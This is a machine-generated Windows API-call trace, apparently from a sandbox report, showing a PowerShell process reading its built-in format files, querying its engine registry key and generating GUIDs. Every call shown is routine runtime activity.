	[0766.127] SetErrorMode (uMode=0x1) returned 0x1
	[0766.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0766.127] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ece28 | out: phkResult=0x1ece28*=0x310) returned 0x0
	[0766.127] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecdac, lpData=0x0, lpcbData=0x1ecda8*=0x0 | out: lpType=0x1ecdac*=0x1, lpData=0x0, lpcbData=0x1ecda8*=0x56) returned 0x0
	[0766.127] CoTaskMemAlloc (cb=0x5a) returned 0x1b3da220
	[0766.127] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd7c, lpData=0x1b3da220, lpcbData=0x1ecd78*=0x56 | out: lpType=0x1ecd7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecd78*=0x56) returned 0x0
	[0766.128] CoTaskMemFree (pv=0x1b3da220) 
	[0766.128] RegCloseKey (hKey=0x310) returned 0x0
	[0766.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0766.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0766.131] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x42495523, Data2=0x3300, Data3=0x41cf, Data4=([0]=0xb4, [1]=0x92, [2]=0x37, [3]=0x66, [4]=0x93, [5]=0x84, [6]=0x43, [7]=0x30))) returned 0x0
	[0766.132] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xfe6b74b1, Data2=0x6019, Data3=0x4367, Data4=([0]=0xa3, [1]=0xde, [2]=0xe8, [3]=0xeb, [4]=0x9a, [5]=0x54, [6]=0x3, [7]=0xaf))) returned 0x0
	[0766.132] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x5268ca7c, Data2=0x692c, Data3=0x4e16, Data4=([0]=0xa0, [1]=0x62, [2]=0xdc, [3]=0x96, [4]=0x2, [5]=0x1f, [6]=0x5d, [7]=0xf8))) returned 0x0
	[0766.133] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xaf5152af, Data2=0x2a08, Data3=0x4d05, Data4=([0]=0x8e, [1]=0xf6, [2]=0x5d, [3]=0xfe, [4]=0x62, [5]=0xa9, [6]=0x68, [7]=0x3b))) returned 0x0
	[0766.134] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xdf6ca219, Data2=0xcd9c, Data3=0x4754, Data4=([0]=0x8a, [1]=0x16, [2]=0x71, [3]=0xf6, [4]=0x18, [5]=0xad, [6]=0x55, [7]=0x90))) returned 0x0
	[0766.135] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xba16c5e, Data2=0xcad9, Data3=0x43e6, Data4=([0]=0xb2, [1]=0x2a, [2]=0x4, [3]=0x29, [4]=0x70, [5]=0x47, [6]=0xd0, [7]=0x9b))) returned 0x0
	[0766.136] VirtualQuery (in: lpAddress=0x1eba00, lpBuffer=0x1ec8c0, dwLength=0x30 | out: lpBuffer=0x1ec8c0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0766.137] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xfe4eea7e, Data2=0xbc29, Data3=0x4c8a, Data4=([0]=0x96, [1]=0x26, [2]=0x2d, [3]=0x57, [4]=0x43, [5]=0x61, [6]=0xd9, [7]=0x87))) returned 0x0
	[0766.137] VirtualQuery (in: lpAddress=0x1eba00, lpBuffer=0x1ec8c0, dwLength=0x30 | out: lpBuffer=0x1ec8c0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0766.139] VirtualQuery (in: lpAddress=0x1eba00, lpBuffer=0x1ec8c0, dwLength=0x30 | out: lpBuffer=0x1ec8c0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0766.140] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x45fc7d6c, Data2=0xc9e, Data3=0x4236, Data4=([0]=0xb2, [1]=0xa5, [2]=0x2d, [3]=0x75, [4]=0xd7, [5]=0xad, [6]=0xc3, [7]=0x7e))) returned 0x0
	[0766.141] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x97ce8968, Data2=0xe004, Data3=0x44f4, Data4=([0]=0xbe, [1]=0x59, [2]=0xc2, [3]=0x84, [4]=0xce, [5]=0x28, [6]=0xc0, [7]=0x6e))) returned 0x0
	[0766.141] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xaca2e965, Data2=0xba05, Data3=0x442a, Data4=([0]=0xb8, [1]=0x8a, [2]=0x1e, [3]=0x8e, [4]=0x16, [5]=0x1f, [6]=0x70, [7]=0x22))) returned 0x0
	[0766.141] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x712b4238, Data2=0x8218, Data3=0x4b6d, Data4=([0]=0xab, [1]=0x8b, [2]=0xf, [3]=0xe1, [4]=0x6c, [5]=0xae, [6]=0x74, [7]=0xb8))) returned 0x0
	[0766.142] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xdb26446e, Data2=0xc46a, Data3=0x49c8, Data4=([0]=0x9e, [1]=0x7a, [2]=0x19, [3]=0x11, [4]=0x73, [5]=0xf3, [6]=0x2f, [7]=0x5e))) returned 0x0
	[0766.144] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xb67c10bb, Data2=0x3fec, Data3=0x4d1e, Data4=([0]=0xa3, [1]=0xf, [2]=0xdd, [3]=0x7f, [4]=0xc3, [5]=0x52, [6]=0x60, [7]=0x63))) returned 0x0
	[0766.144] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xa4068d36, Data2=0xe599, Data3=0x430e, Data4=([0]=0x85, [1]=0xbf, [2]=0xa0, [3]=0xd6, [4]=0xc2, [5]=0x80, [6]=0xfa, [7]=0x3c))) returned 0x0
	[0766.145] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xff67b3fe, Data2=0x4d62, Data3=0x4c2e, Data4=([0]=0xb7, [1]=0x11, [2]=0xd8, [3]=0x8d, [4]=0x40, [5]=0x7a, [6]=0x9c, [7]=0x7f))) returned 0x0
	[0766.145] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xb54df91d, Data2=0x3a84, Data3=0x4633, Data4=([0]=0x9b, [1]=0xf9, [2]=0x7f, [3]=0x7a, [4]=0x86, [5]=0xf6, [6]=0x35, [7]=0x90))) returned 0x0
	[0766.145] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xefe4f6c7, Data2=0x2a0a, Data3=0x457b, Data4=([0]=0xba, [1]=0x15, [2]=0x88, [3]=0xaa, [4]=0xcc, [5]=0x12, [6]=0x20, [7]=0x8))) returned 0x0
	[0766.146] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xd8d16d4b, Data2=0x2074, Data3=0x4083, Data4=([0]=0x86, [1]=0x93, [2]=0x88, [3]=0xca, [4]=0x5c, [5]=0x5, [6]=0x8, [7]=0x35))) returned 0x0
	[0768.111] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x86bc7abf, Data2=0x7f4, Data3=0x4df5, Data4=([0]=0xb9, [1]=0x4b, [2]=0x49, [3]=0x8f, [4]=0xd4, [5]=0xaf, [6]=0xb7, [7]=0xae))) returned 0x0
	[0768.112] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x109e4266, Data2=0x3a6f, Data3=0x47fd, Data4=([0]=0x83, [1]=0x9d, [2]=0xf, [3]=0x6e, [4]=0x9e, [5]=0x1c, [6]=0x3a, [7]=0xa9))) returned 0x0
	[0768.112] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x5375a843, Data2=0x67fd, Data3=0x4a24, Data4=([0]=0x88, [1]=0x8c, [2]=0xfc, [3]=0xc, [4]=0x7f, [5]=0xf3, [6]=0x92, [7]=0xe8))) returned 0x0
	[0768.112] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xa257629a, Data2=0x7741, Data3=0x4ad7, Data4=([0]=0xb8, [1]=0x25, [2]=0x39, [3]=0xe9, [4]=0x21, [5]=0x78, [6]=0xa9, [7]=0x80))) returned 0x0
	[0768.113] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x59edd2c2, Data2=0xd8d9, Data3=0x425b, Data4=([0]=0xbf, [1]=0xe2, [2]=0x3d, [3]=0x30, [4]=0x68, [5]=0x22, [6]=0x70, [7]=0x88))) returned 0x0
	[0768.113] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x63c3de54, Data2=0x10ba, Data3=0x4b4a, Data4=([0]=0x95, [1]=0xf7, [2]=0xf2, [3]=0x1f, [4]=0xd, [5]=0x54, [6]=0xbb, [7]=0xf0))) returned 0x0
	[0768.113] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x1ebde51e, Data2=0xbe7d, Data3=0x4744, Data4=([0]=0x8a, [1]=0x50, [2]=0x65, [3]=0x3, [4]=0xe7, [5]=0xba, [6]=0x8e, [7]=0xe6))) returned 0x0
	[0768.113] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x31ee86d5, Data2=0x3e67, Data3=0x4a33, Data4=([0]=0x95, [1]=0x55, [2]=0xbb, [3]=0x56, [4]=0x96, [5]=0x25, [6]=0x34, [7]=0xa2))) returned 0x0
	[0768.114] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xce0201b, Data2=0xf2b9, Data3=0x46cc, Data4=([0]=0xa0, [1]=0x58, [2]=0x59, [3]=0xbe, [4]=0xf2, [5]=0x3a, [6]=0xea, [7]=0xd))) returned 0x0
	[0768.114] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xc2339602, Data2=0x5e66, Data3=0x4469, Data4=([0]=0x89, [1]=0xb3, [2]=0xd1, [3]=0x4d, [4]=0x51, [5]=0xb6, [6]=0x91, [7]=0x1a))) returned 0x0
	[0768.114] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xbabfbcdd, Data2=0xdd4a, Data3=0x44de, Data4=([0]=0x8a, [1]=0xd8, [2]=0x48, [3]=0x43, [4]=0x87, [5]=0x3f, [6]=0xb1, [7]=0x25))) returned 0x0
	[0768.115] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x82d72d20, Data2=0xe7c6, Data3=0x470a, Data4=([0]=0x82, [1]=0xc6, [2]=0x68, [3]=0x18, [4]=0xe4, [5]=0x1d, [6]=0xc5, [7]=0x1f))) returned 0x0
	[0768.115] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x5cdc1558, Data2=0xf4ab, Data3=0x421b, Data4=([0]=0x88, [1]=0x58, [2]=0x2d, [3]=0x5f, [4]=0x9b, [5]=0xc5, [6]=0x93, [7]=0x7a))) returned 0x0
	[0768.115] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xa14b0436, Data2=0x8716, Data3=0x48ce, Data4=([0]=0xb1, [1]=0xb3, [2]=0x11, [3]=0x8a, [4]=0xf6, [5]=0xb7, [6]=0xb9, [7]=0x48))) returned 0x0
	[0768.115] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x4dd2e342, Data2=0x88c9, Data3=0x40ad, Data4=([0]=0x82, [1]=0xa8, [2]=0x0, [3]=0x69, [4]=0xa7, [5]=0x86, [6]=0x71, [7]=0x10))) returned 0x0
	[0768.116] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xa7627171, Data2=0x6a40, Data3=0x4da1, Data4=([0]=0xbb, [1]=0xda, [2]=0x1b, [3]=0x7f, [4]=0xee, [5]=0x2b, [6]=0x6b, [7]=0xcb))) returned 0x0
	[0768.116] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xf6e3dd09, Data2=0x8345, Data3=0x4651, Data4=([0]=0xa1, [1]=0x10, [2]=0xde, [3]=0xea, [4]=0xa, [5]=0x1d, [6]=0xb7, [7]=0x50))) returned 0x0
	[0768.116] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x8f71b682, Data2=0xd510, Data3=0x4297, Data4=([0]=0x96, [1]=0x3f, [2]=0xec, [3]=0x62, [4]=0x4a, [5]=0xa0, [6]=0xef, [7]=0xb6))) returned 0x0
	[0769.447] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x9144071, Data2=0x1d91, Data3=0x4a4b, Data4=([0]=0x85, [1]=0xc0, [2]=0x34, [3]=0xf4, [4]=0xf2, [5]=0xfb, [6]=0x3b, [7]=0x26))) returned 0x0
	[0769.447] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0769.447] GetFileType (hFile=0x310) returned 0x1
	[0769.447] SetErrorMode (uMode=0x1) returned 0x1
	[0769.447] GetFileType (hFile=0x310) returned 0x1
	[0769.447] ReadFile (in: hFile=0x310, lpBuffer=0x2ca5508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2ca5508*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.447] ReadFile (in: hFile=0x310, lpBuffer=0x2ca5508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2ca5508*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.448] ReadFile (in: hFile=0x310, lpBuffer=0x2ca5508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2ca5508*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.448] ReadFile (in: hFile=0x310, lpBuffer=0x2ca5508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2ca5508*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.448] ReadFile (in: hFile=0x310, lpBuffer=0x2ca5508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2ca5508*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.448] ReadFile (in: hFile=0x310, lpBuffer=0x2ca5508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2ca5508*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.448] ReadFile (in: hFile=0x310, lpBuffer=0x2ca5508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2ca5508*, lpNumberOfBytesRead=0x1ecd98*=0x119, lpOverlapped=0x0) returned 1
	[0769.448] ReadFile (in: hFile=0x310, lpBuffer=0x2ca5508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2ca5508*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0769.449] CloseHandle (hObject=0x310) returned 1
	[0769.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0769.449] SetErrorMode (uMode=0x1) returned 0x1
	[0769.449] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecd40 | out: lpFileInformation=0x1ecd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0769.449] SetErrorMode (uMode=0x1) returned 0x1
	[0769.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0769.450] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ece28 | out: phkResult=0x1ece28*=0x310) returned 0x0
	[0769.450] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecdac, lpData=0x0, lpcbData=0x1ecda8*=0x0 | out: lpType=0x1ecdac*=0x1, lpData=0x0, lpcbData=0x1ecda8*=0x56) returned 0x0
	[0769.450] CoTaskMemAlloc (cb=0x5a) returned 0x1b3da220
	[0769.450] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd7c, lpData=0x1b3da220, lpcbData=0x1ecd78*=0x56 | out: lpType=0x1ecd7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecd78*=0x56) returned 0x0
	[0769.450] CoTaskMemFree (pv=0x1b3da220) 
	[0769.450] RegCloseKey (hKey=0x310) returned 0x0
	[0769.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0769.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0769.451] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x7be6e5e5, Data2=0xe164, Data3=0x43ee, Data4=([0]=0xa3, [1]=0x39, [2]=0x21, [3]=0xe1, [4]=0x9a, [5]=0x2b, [6]=0x63, [7]=0x19))) returned 0x0
	[0769.451] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x61c18637, Data2=0xc471, Data3=0x4a9e, Data4=([0]=0x88, [1]=0x67, [2]=0x4d, [3]=0xa2, [4]=0xbc, [5]=0x81, [6]=0x36, [7]=0xa4))) returned 0x0
	[0769.451] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x96c93b37, Data2=0x2091, Data3=0x4eb3, Data4=([0]=0x87, [1]=0xb5, [2]=0x65, [3]=0xc, [4]=0xa6, [5]=0x3a, [6]=0x1d, [7]=0x26))) returned 0x0
	[0769.452] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xa414e123, Data2=0xa307, Data3=0x41c0, Data4=([0]=0xbd, [1]=0x1f, [2]=0x1e, [3]=0x39, [4]=0xc9, [5]=0x7b, [6]=0x8b, [7]=0x71))) returned 0x0
	[0769.452] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0769.452] GetFileType (hFile=0x310) returned 0x1
	[0769.452] SetErrorMode (uMode=0x1) returned 0x1
	[0769.452] GetFileType (hFile=0x310) returned 0x1
	[0769.452] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.453] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.453] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.453] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.453] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.453] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.453] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.454] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.455] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.455] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.455] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.455] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.455] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.456] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.456] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.456] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.456] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.457] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.457] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.457] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.458] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.458] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
